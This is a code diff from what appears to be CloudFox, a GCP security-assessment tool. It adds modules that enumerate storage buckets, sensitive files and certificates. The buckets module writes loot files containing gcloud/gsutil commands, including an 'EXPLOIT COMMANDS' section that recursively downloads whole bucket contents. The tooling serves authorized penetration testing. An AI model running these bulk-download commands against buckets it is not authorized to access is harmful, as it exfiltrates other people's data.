"Content Type", "Size", "Public", "Encryption", "Updated"} +} + +func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { + var body [][]string + for _, file := range files { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + file.Encryption, + file.Description, + }) + } + return body +} + +func (m *BucketEnumModule) 
sensitiveFilesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { + var body [][]string + for _, file := range files { + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + publicStatus := "No" + if file.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + m.GetProjectName(file.ProjectID), + file.BucketName, + file.ObjectName, + file.Category, + formatFileSize(file.Size), + publicStatus, + file.Encryption, + }) + } + } + return body +} + +func (m *BucketEnumModule) allObjectsToTableBody(objects []bucketenumservice.ObjectInfo) [][]string { + var body [][]string + for _, obj := range objects { + publicStatus := "No" + if obj.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + m.GetProjectName(obj.ProjectID), + obj.BucketName, + obj.ObjectName, + obj.ContentType, + formatFileSize(obj.Size), + publicStatus, + obj.Encryption, + obj.Updated, + }) + } + return body +} + +func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if m.EnumerateAll { + // Full enumeration mode + objects := m.ProjectAllObjects[projectID] + if len(objects) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "storage-enum-all", + Header: m.getAllObjectsHeader(), + Body: m.allObjectsToTableBody(objects), + }) + } + } else { + // Sensitive files mode + files := m.ProjectSensitiveFiles[projectID] + if len(files) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "storage-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(files), + }) + + sensitiveBody := m.sensitiveFilesToTableBody(files) + if len(sensitiveBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "storage-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + } + } + } + + return tableFiles +} + +func (m *BucketEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + 
outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get the appropriate project map based on mode + var projectIDs []string + if m.EnumerateAll { + for projectID := range m.ProjectAllObjects { + projectIDs = append(projectIDs, projectID) + } + } else { + for projectID := range m.ProjectSensitiveFiles { + projectIDs = append(projectIDs, projectID) + } + } + + for _, projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BucketEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_STORAGEENUM_MODULE_NAME) + } +} + +func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + if m.EnumerateAll { + // Full enumeration mode + allObjects := m.getAllObjects() + if len(allObjects) > 0 { + tables = append(tables, internal.TableFile{ + Name: "storage-enum-all", + Header: m.getAllObjectsHeader(), + Body: m.allObjectsToTableBody(allObjects), + }) + + // Count public objects + publicCount := 0 + for _, obj := range allObjects { + if obj.IsPublic { + publicCount++ + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible object(s)!", publicCount), globals.GCP_STORAGEENUM_MODULE_NAME) + } + } + } else { + // Sensitive 
files mode + allFiles := m.getAllSensitiveFiles() + if len(allFiles) > 0 { + tables = append(tables, internal.TableFile{ + Name: "storage-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(allFiles), + }) + + sensitiveBody := m.sensitiveFilesToTableBody(allFiles) + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "storage-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_STORAGEENUM_MODULE_NAME) + } + } + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BucketEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_STORAGEENUM_MODULE_NAME) + } +} + +// getObjectDir returns the directory portion of an object path +// e.g., "processReports-pilot-gcp-01/function-source.zip" -> "processReports-pilot-gcp-01/" +// e.g., "file.txt" -> "" +func getObjectDir(objectName string) string { + lastSlash := strings.LastIndex(objectName, "/") + if lastSlash == -1 { + return "" + } + return objectName[:lastSlash+1] +} + +func formatFileSize(bytes int64) string { + const ( + KB = 1024 + MB = KB * 1024 + GB = MB * 1024 + ) + + switch { + case bytes >= GB: + return fmt.Sprintf("%.1f GB", float64(bytes)/GB) + case bytes >= MB: + return fmt.Sprintf("%.1f MB", float64(bytes)/MB) + 
case bytes >= KB: + return fmt.Sprintf("%.1f KB", float64(bytes)/KB) + default: + return fmt.Sprintf("%d B", bytes) + } +} diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index a0a5944c..d0b0df9f 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -1,115 +1,482 @@ package commands import ( + "context" "fmt" + "strings" + "sync" CloudStorageService "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) -var GCPBucketsCommand = &cobra.Command{ - Use: globals.GCP_BUCKETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP buckets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available bucket information: -cloudfox gcp buckets`, - Run: runGCPBucketsCommand, +var GCPStorageCommand = &cobra.Command{ + Use: globals.GCP_STORAGE_MODULE_NAME, + Aliases: []string{"buckets", "gcs"}, + Short: "Enumerate GCP Cloud Storage buckets with security configuration", + Long: `Enumerate GCP Cloud Storage buckets across projects with security-relevant details. 
+ +Features: +- Lists all buckets accessible to the authenticated user +- Shows security configuration (public access prevention, uniform access, versioning) +- Enumerates IAM policies and identifies public buckets +- Shows encryption type (Google-managed vs CMEK) +- Shows retention, soft delete, and lifecycle policies +- Generates gcloud commands for further enumeration +- Generates exploitation commands for data access + +Security Columns: +- Public: Whether the bucket has allUsers or allAuthenticatedUsers access +- Public Access Prevention: + "enforced" = Public access blocked at bucket level + "inherited" = Inherits from project/org (may allow public if not blocked above) + "unspecified" = No prevention (most permissive) +- Uniform Access: + "Yes" = IAM-only access control (recommended, no ACLs) + "No (ACLs)" = Legacy ACLs enabled - access can be granted at object level + bypassing bucket IAM, harder to audit +- Soft Delete: Retention period for deleted objects (ransomware protection) + "No" = Deleted objects are immediately removed + "Xd" = Deleted objects retained for X days before permanent deletion +- Lifecycle: Automated object management rules + "Delete@Xd" = Objects auto-deleted after X days (data loss risk if short) + "Archive" = Objects transitioned to cheaper storage classes + "X rules" = Number of lifecycle rules configured +- Versioning: Object versioning (helps recovery, compliance) +- Encryption: "Google-managed" or "CMEK" (customer-managed keys)`, + Run: runGCPStorageCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BucketsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectBuckets map[string][]CloudStorageService.BucketInfo // projectID -> buckets + LootMap map[string]map[string]*internal.LootFile // 
projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} -// Results struct that implements the internal.OutputInterface -type GCPBucketsResults struct { - Data []CloudStorageService.BucketInfo +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BucketsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPBucketsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (o BucketsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketsOutput) LootFiles() []internal.LootFile { return o.Loot } - header := []string{ - "Name", - "Location", - "ProjectID", +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPStorageCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_STORAGE_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string + // Create module instance + module := &BucketsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectBuckets: make(map[string][]CloudStorageService.BucketInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } - for _, value := range g.Data { - body = append( - body, - []string{ - value.Name, - value.Location, - value.ProjectID, - }, - ) + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache 
!= nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_STORAGE_MODULE_NAME) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_BUCKETS_MODULE_NAME, + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_STORAGE_MODULE_NAME, m.processProject) + + // Get all buckets for stats + allBuckets := m.getAllBuckets() + if len(allBuckets) == 0 { + logger.InfoM("No buckets found", globals.GCP_STORAGE_MODULE_NAME) + return + } + + // Count public buckets for summary + publicCount := 0 + for _, bucket := range allBuckets { + if bucket.IsPublic { + publicCount++ + } } - tableFiles = append(tableFiles, tableFile) - return tableFiles + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(allBuckets), publicCount), globals.GCP_STORAGE_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(allBuckets)), globals.GCP_STORAGE_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) } -// Decide what is loot based on resource information -func (g GCPBucketsResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +// getAllBuckets returns all buckets from all projects (for statistics) +func (m *BucketsModule) getAllBuckets() []CloudStorageService.BucketInfo { + var all []CloudStorageService.BucketInfo + for _, buckets := range m.ProjectBuckets { + all = append(all, buckets...) 
+ } + return all } -// Houses high-level logic that retrieves resources and writes to output -func runGCPBucketsCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BUCKETS_MODULE_NAME) +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BucketsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_STORAGE_MODULE_NAME) + } + + // Create service and fetch buckets + cs := CloudStorageService.New() + buckets, err := cs.Buckets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_STORAGE_MODULE_NAME, + fmt.Sprintf("Could not enumerate buckets in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectBuckets[projectID] = buckets + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["buckets-commands"] = &internal.LootFile{ + Name: "buckets-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + // Generate loot for each bucket + for _, bucket := range buckets { + m.addBucketToLoot(projectID, bucket) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project 
%s", len(buckets), projectID), globals.GCP_STORAGE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageService.BucketInfo) { + lootFile := m.LootMap[projectID]["buckets-commands"] + if lootFile == nil { + return } - if value, ok := ctx.Value("account").(string); ok { - account = value + // All commands for this bucket + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# BUCKET: gs://%s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe bucket:\n"+ + "gcloud storage buckets describe gs://%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud storage buckets get-iam-policy gs://%s --project=%s\n"+ + "# List objects:\n"+ + "gsutil ls gs://%s/\n"+ + "gsutil ls -L gs://%s/\n"+ + "# List all objects recursively:\n"+ + "gsutil ls -r gs://%s/**\n"+ + "# Get bucket size:\n"+ + "gsutil du -s gs://%s/\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Download all contents (create directory first):\n"+ + "mkdir -p bucket/%s/\n"+ + "gsutil -m cp -r gs://%s/ bucket/%s/\n"+ + "# Check for public access:\n"+ + "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, bucket.ProjectID, + bucket.Name, bucket.ProjectID, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, bucket.Name, + bucket.Name, + ) +} + +// Helper functions are now provided by the shared package: +// - shared.BoolToYesNo() for boolean formatting +// - shared.GetPrincipalType() for IAM member type extraction + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BucketsModule) writeOutput(ctx context.Context, logger 
internal.Logger) { + // Log findings first + allBuckets := m.getAllBuckets() + publicCount := 0 + for _, bucket := range allBuckets { + if bucket.IsPublic { + publicCount++ + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_STORAGE_MODULE_NAME) + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BUCKETS_MODULE_NAME) + m.writeFlatOutput(ctx, logger) } +} - // Get the bucket info using the projectIDs and CloudStorageService - cs := CloudStorageService.New() - var results []CloudStorageService.BucketInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - result, err := cs.Buckets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return +// writeHierarchicalOutput writes output to per-project directories +func (m *BucketsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, buckets := range m.ProjectBuckets { + body := m.bucketsToTableBody(buckets) + tables := []internal.TableFile{{ + Name: globals.GCP_STORAGE_MODULE_NAME, + Header: 
header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BucketsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_STORAGE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *BucketsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allBuckets := m.getAllBuckets() + body := m.bucketsToTableBody(allBuckets) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - results = append(results, result...) 
- logger.InfoM(fmt.Sprintf("Done retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - cloudfoxOutput := GCPBucketsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BUCKETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_STORAGE_MODULE_NAME, + Header: header, + Body: body, + }} + + output := BucketsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_STORAGE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the buckets table header +func (m *BucketsModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Location", + "Public", + "Public Access Prevention", + "Uniform Access", + "Soft Delete", + "Lifecycle", + "Versioning", + "Encryption", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + "Principal Attack Paths", + } +} + +// bucketsToTableBody converts buckets to table body rows +func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketInfo) [][]string { + var body [][]string + for _, bucket := range buckets { + // Format public access + publicDisplay := "No" + if bucket.IsPublic { + publicDisplay = bucket.PublicAccess + } + + // Format soft delete + 
softDeleteDisplay := "No" + if bucket.SoftDeleteEnabled { + softDeleteDisplay = fmt.Sprintf("%dd", bucket.SoftDeleteRetentionDays) + } + + // Format lifecycle - show delete rule age if present + lifecycleDisplay := "No" + if bucket.LifecycleEnabled { + if bucket.HasDeleteRule && bucket.ShortestDeleteDays > 0 { + lifecycleDisplay = fmt.Sprintf("Delete@%dd", bucket.ShortestDeleteDays) + } else if bucket.HasArchiveRule { + lifecycleDisplay = "Archive" + } else { + lifecycleDisplay = fmt.Sprintf("%d rules", bucket.LifecycleRuleCount) + } + } + + // Format uniform access - highlight security concern if disabled + uniformAccessDisplay := "Yes" + if !bucket.UniformBucketLevelAccess { + uniformAccessDisplay = "No (ACLs)" + } + + // Format encryption - show KMS key if CMEK + encryptionDisplay := bucket.EncryptionType + if bucket.EncryptionType == "CMEK" && bucket.KMSKeyName != "" { + // Extract just the key name from the full path for display + // Format: projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY + keyParts := strings.Split(bucket.KMSKeyName, "/") + if len(keyParts) >= 2 { + encryptionDisplay = fmt.Sprintf("CMEK (%s)", keyParts[len(keyParts)-1]) + } + } + + // One row per IAM member + if len(bucket.IAMBindings) > 0 { + for _, binding := range bucket.IAMBindings { + for _, member := range binding.Members { + memberType := shared.GetPrincipalType(member) + + // Check attack paths for service account principals + attackPaths := "-" + if memberType == "ServiceAccount" { + // Extract email from member string (serviceAccount:email@...) 
+ email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, email) + } + + body = append(body, []string{ + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + bucket.PublicAccessPrevention, + uniformAccessDisplay, + softDeleteDisplay, + lifecycleDisplay, + shared.BoolToYesNo(bucket.VersioningEnabled), + encryptionDisplay, + binding.Role, + memberType, + member, + attackPaths, + }) + } + } + } else { + // Bucket with no IAM bindings + body = append(body, []string{ + m.GetProjectName(bucket.ProjectID), + bucket.Name, + bucket.Location, + publicDisplay, + bucket.PublicAccessPrevention, + uniformAccessDisplay, + softDeleteDisplay, + lifecycleDisplay, + shared.BoolToYesNo(bucket.VersioningEnabled), + encryptionDisplay, + "-", + "-", + "-", + "-", + }) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) } + return body } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go new file mode 100644 index 00000000..0e279059 --- /dev/null +++ b/gcp/commands/certmanager.go @@ -0,0 +1,382 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCertManagerCommand = &cobra.Command{ + Use: globals.GCP_CERTMANAGER_MODULE_NAME, + Aliases: []string{"certs", "certificates", "ssl"}, + Short: "Enumerate SSL/TLS certificates and find expiring or misconfigured certs", + Long: `Enumerate SSL/TLS certificates from Certificate Manager and Compute Engine. 
+ +This module finds all certificates and identifies security issues: +- Expired or soon-to-expire certificates +- Failed certificate issuance +- Wildcard certificates (higher impact if compromised) +- Self-managed certificates that need manual renewal + +Security Relevance: +- Expired certificates cause outages and security warnings +- Wildcard certificates can be abused to MITM any subdomain +- Certificate domains reveal infrastructure and services +- Self-managed certs may have exposed private keys + +What this module finds: +- Certificate Manager certificates (global) +- Compute Engine SSL certificates (classic) +- Certificate maps +- Expiration status +- Associated domains`, + Run: runGCPCertManagerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CertManagerModule struct { + gcpinternal.BaseGCPModule + + ProjectCertificates map[string][]certmanagerservice.Certificate // projectID -> certificates + ProjectSSLCertificates map[string][]certmanagerservice.SSLCertificate // projectID -> SSL certs + ProjectCertMaps map[string][]certmanagerservice.CertificateMap // projectID -> cert maps + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CertManagerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CertManagerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CertManagerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CERTMANAGER_MODULE_NAME) + if err != nil { + return + } + + module := &CertManagerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectCertificates: make(map[string][]certmanagerservice.Certificate), + 
ProjectSSLCertificates: make(map[string][]certmanagerservice.SSLCertificate), + ProjectCertMaps: make(map[string][]certmanagerservice.CertificateMap), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CERTMANAGER_MODULE_NAME, m.processProject) + + allCerts := m.getAllCertificates() + allSSLCerts := m.getAllSSLCertificates() + allCertMaps := m.getAllCertMaps() + + totalCerts := len(allCerts) + len(allSSLCerts) + + if totalCerts == 0 { + logger.InfoM("No certificates found", globals.GCP_CERTMANAGER_MODULE_NAME) + return + } + + // Count expiring/expired certs + expiringCount := 0 + expiredCount := 0 + + for _, cert := range allCerts { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + for _, cert := range allSSLCerts { + if cert.DaysUntilExpiry < 0 { + expiredCount++ + } else if cert.DaysUntilExpiry <= 30 { + expiringCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d certificate(s), %d map(s)", + totalCerts, len(allCertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) + + if expiredCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] %d certificate(s) have EXPIRED!", expiredCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + if expiringCount > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d certificate(s) expire within 30 days", expiringCount), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *CertManagerModule) getAllCertificates() []certmanagerservice.Certificate { + var all []certmanagerservice.Certificate + for _, certs := range m.ProjectCertificates { + all = append(all, certs...) 
+ } + return all +} + +func (m *CertManagerModule) getAllSSLCertificates() []certmanagerservice.SSLCertificate { + var all []certmanagerservice.SSLCertificate + for _, certs := range m.ProjectSSLCertificates { + all = append(all, certs...) + } + return all +} + +func (m *CertManagerModule) getAllCertMaps() []certmanagerservice.CertificateMap { + var all []certmanagerservice.CertificateMap + for _, maps := range m.ProjectCertMaps { + all = append(all, maps...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CertManagerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking certificates in project: %s", projectID), globals.GCP_CERTMANAGER_MODULE_NAME) + } + + svc := certmanagerservice.New() + + // Get Certificate Manager certs + certs, err := svc.GetCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificates in project %s", projectID)) + } + + // Get classic SSL certs + sslCerts, err := svc.GetSSLCertificates(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate SSL certificates in project %s", projectID)) + } + + // Get certificate maps + certMaps, err := svc.GetCertificateMaps(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CERTMANAGER_MODULE_NAME, + fmt.Sprintf("Could not enumerate certificate maps in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectCertificates[projectID] = certs + m.ProjectSSLCertificates[projectID] = sslCerts + m.ProjectCertMaps[projectID] = certMaps + m.mu.Unlock() +} + +// ------------------------------ +// Output Generation 
+// ------------------------------ +func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CertManagerModule) getCertificatesHeader() []string { + return []string{"Project", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} +} + +func (m *CertManagerModule) getCertMapsHeader() []string { + return []string{"Project", "Name", "Location", "Entries", "Certificates"} +} + +func (m *CertManagerModule) certsToTableBody(certs []certmanagerservice.Certificate, sslCerts []certmanagerservice.SSLCertificate) [][]string { + var body [][]string + + for _, cert := range certs { + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" + } + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" + } + + body = append(body, []string{ + m.GetProjectName(cert.ProjectID), + cert.Name, + cert.Type, + strings.Join(cert.Domains, ", "), + cert.ExpireTime, + 